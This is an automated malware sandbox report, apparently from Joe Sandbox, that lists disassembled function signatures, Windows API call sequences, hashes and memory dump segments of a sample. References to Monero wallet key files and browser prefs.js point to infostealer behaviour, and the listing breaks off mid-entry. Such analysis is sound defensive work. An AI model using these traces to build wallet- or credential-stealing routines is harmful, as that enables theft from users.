                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: dcc89564fb7fcd15da38beb535ffe75117d5f6f7c5f96d879b5488fca979f68b
                          • Instruction ID: ff16948caae6fdc38360a61b5e5ef7b54323fd1d353b7e4a738a6d5da3623ed8
                          • Opcode Fuzzy Hash: dcc89564fb7fcd15da38beb535ffe75117d5f6f7c5f96d879b5488fca979f68b
                          • Instruction Fuzzy Hash: 306166B1500218AFCB24EBA5DC49EFA777CBB48700F048598B649A6180EB71DBC9CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C04580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C04587
                          • wsprintfA.USER32 ref: 00C045A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C045BD
                          • StrCmpCA.SHLWAPI(?,00C10FC4), ref: 00C045EB
                          • StrCmpCA.SHLWAPI(?,00C10FC8), ref: 00C04601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0468B
                          • FindClose.KERNEL32(000000FF), ref: 00C046A0
                          • lstrcat.KERNEL32(?,006EE4A0), ref: 00C046C5
                          • lstrcat.KERNEL32(?,006ED798), ref: 00C046D8
                          • lstrlen.KERNEL32(?), ref: 00C046E5
                          • lstrlen.KERNEL32(?), ref: 00C046F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 7a8cdc3115d9d4b68bbaba8d0c43dff3de9fd982080bdaadadd22fd1c9e99034
                          • Instruction ID: 984d5192fb1771bbbc4ba3f10896b09e23f4bc5b0412834630cd669a5d92f511
                          • Opcode Fuzzy Hash: 7a8cdc3115d9d4b68bbaba8d0c43dff3de9fd982080bdaadadd22fd1c9e99034
                          • Instruction Fuzzy Hash: F45143B150021C9FC724EBB4DC8DFEA777CAB58300F444598B649A2190EB759BC9CF91
                          APIs
                          • wsprintfA.USER32 ref: 00C03EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C03EDA
                          • StrCmpCA.SHLWAPI(?,00C10FAC), ref: 00C03F08
                          • StrCmpCA.SHLWAPI(?,00C10FB0), ref: 00C03F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0406C
                          • FindClose.KERNEL32(000000FF), ref: 00C04081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: e5bd58c45ba7353a45ca17bbfe769f9163305d0d0c9bc290fed449a671228b7b
                          • Instruction ID: 14693d51dad7b3e3b7721c148b58555fefed4fb2a459dc0860c924e315401078
                          • Opcode Fuzzy Hash: e5bd58c45ba7353a45ca17bbfe769f9163305d0d0c9bc290fed449a671228b7b
                          • Instruction Fuzzy Hash: DB5124B190021CAFCB24EBB5DC8AEFA777CBB54300F448598B659A6080DB75DB89CF51
                          APIs
                          • wsprintfA.USER32 ref: 00BFED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00BFED55
                          • StrCmpCA.SHLWAPI(?,00C11538), ref: 00BFEDAB
                          • StrCmpCA.SHLWAPI(?,00C1153C), ref: 00BFEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00BFF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 66f77b51cb6e1ceff2ea830cd0a99fbd78d19e2eb179c829877bf0547073185d
                          • Instruction ID: 1bb7f239b9156038161cd9a14b4da60fee9c8102ac5fb8ef458a2c5bf954cc6f
                          • Opcode Fuzzy Hash: 66f77b51cb6e1ceff2ea830cd0a99fbd78d19e2eb179c829877bf0547073185d
                          • Instruction Fuzzy Hash: AFE1C1719112189AEB54FB61DC96FEE7378AF54300F4085E9B50A620D2EF306F8ADF52
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C115B8,00C10D96), ref: 00BFF71E
                          • StrCmpCA.SHLWAPI(?,00C115BC), ref: 00BFF76F
                          • StrCmpCA.SHLWAPI(?,00C115C0), ref: 00BFF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00BFFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 38fadb23b2598237ba1b24b91af8d7208bf88896ce656d8bba6a5e88e636c780
                          • Instruction ID: 5093565d9c6a405a8deab22d713c3dacf6fbfe1b14e7451524199e2f62d7d42a
                          • Opcode Fuzzy Hash: 38fadb23b2598237ba1b24b91af8d7208bf88896ce656d8bba6a5e88e636c780
                          • Instruction Fuzzy Hash: 8BB11F719102189BDB24FF64DC96FFE7379AF94300F4086A8A50A971D1EF306B49DB92
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C1510C,?,?,?,00C151B4,?,?,00000000,?,00000000), ref: 00BF1923
                          • StrCmpCA.SHLWAPI(?,00C1525C), ref: 00BF1973
                          • StrCmpCA.SHLWAPI(?,00C15304), ref: 00BF1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BF1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00BF1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF1E20
                          • FindClose.KERNEL32(000000FF), ref: 00BF1E32
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 5241b3a749d1a10841af9f9b57573b16bc7c50addfa302a481ffff022270ec4b
                          • Instruction ID: c59d74a2304bf287056c68fdd87c5c7516e7723714cdcc873db5cd22611686c2
                          • Opcode Fuzzy Hash: 5241b3a749d1a10841af9f9b57573b16bc7c50addfa302a481ffff022270ec4b
                          • Instruction Fuzzy Hash: 3212F0719102189BDB55FB60CC96EEE7378AF54300F4086E9B50A660D1EF706F89DFA1
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C10C2E), ref: 00BFDE5E
                          • StrCmpCA.SHLWAPI(?,00C114C8), ref: 00BFDEAE
                          • StrCmpCA.SHLWAPI(?,00C114CC), ref: 00BFDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00BFE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 834c997ec0daa9bc3bc67c600e183f050ec2d788e4d9330d59b487274d1538e9
                          • Instruction ID: fb5a1f2df36a105ef17f0aa2895c2bccef257f3f88791614c24c74147f8541d0
                          • Opcode Fuzzy Hash: 834c997ec0daa9bc3bc67c600e183f050ec2d788e4d9330d59b487274d1538e9
                          • Instruction Fuzzy Hash: 68F190719202189ADB15FB61DC95FEE7378BF14300F4042E9A51A620D1EF346F89DF52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /Z1>$94FB$Pw$SPE~$YQ_$Yy|$dvj]$eo1k$t7g$wh~
                          • API String ID: 0-777395225
                          • Opcode ID: c3dd633101c4bfa5d72ae7ee44bb98e067409cfd9ed7df34fc0a6b5272e57eb8
                          • Instruction ID: eb199a411f7c27599641d8a8b7e5175460b4b0a66c17b0656908eeb3723e26b3
                          • Opcode Fuzzy Hash: c3dd633101c4bfa5d72ae7ee44bb98e067409cfd9ed7df34fc0a6b5272e57eb8
                          • Instruction Fuzzy Hash: C7A237F360C204AFE7046E2DEC4567AFBE9EF94720F164A3DEAC487740EA3558048697
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C114B0,00C10C2A), ref: 00BFDAEB
                          • StrCmpCA.SHLWAPI(?,00C114B4), ref: 00BFDB33
                          • StrCmpCA.SHLWAPI(?,00C114B8), ref: 00BFDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00BFDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 78b35256503c5a616edc65bc5f915c884ce7eccf88b83e3aadbd6f14b255dffa
                          • Instruction ID: 8b2a776c00a94f810894ccc94eac7d0bf3ccd0354791ad6816b742812584ca86
                          • Opcode Fuzzy Hash: 78b35256503c5a616edc65bc5f915c884ce7eccf88b83e3aadbd6f14b255dffa
                          • Instruction Fuzzy Hash: 9D9100729002089BCB14FB74DC9AAFD777DAB94300F408668B94A971C1EE349B5DDB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *M]$+$vW$A$}b$S/<$TU$c/<$c;V}$~"/$ZKn
                          • API String ID: 0-2432471437
                          • Opcode ID: b89fdf7ca68ce864ddca7ee933a5791331ebe01fc6a4e5a4d1ada9c7b9ebbcd7
                          • Instruction ID: 1e51781bed4bf48b9ff0830fe0971b23eedc8504c629f90b38995938d4b701fe
                          • Opcode Fuzzy Hash: b89fdf7ca68ce864ddca7ee933a5791331ebe01fc6a4e5a4d1ada9c7b9ebbcd7
                          • Instruction Fuzzy Hash: C3B207F3A0C2009FE3046E2DEC8567ABBE9EF94720F1A493DEAC5C7744E63558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -!A$@DOs${cg$|^=$o[$N|g$N|g$Rg
                          • API String ID: 0-2872453939
                          • Opcode ID: 1a4bb9907c88632fadbbdf02320ec303d5fbbb48ac3146026bcedd408af7d2c7
                          • Instruction ID: 2a344029c1bc55576e1ac52e79cbd450e7062812a34282ce5b9dabd884332716
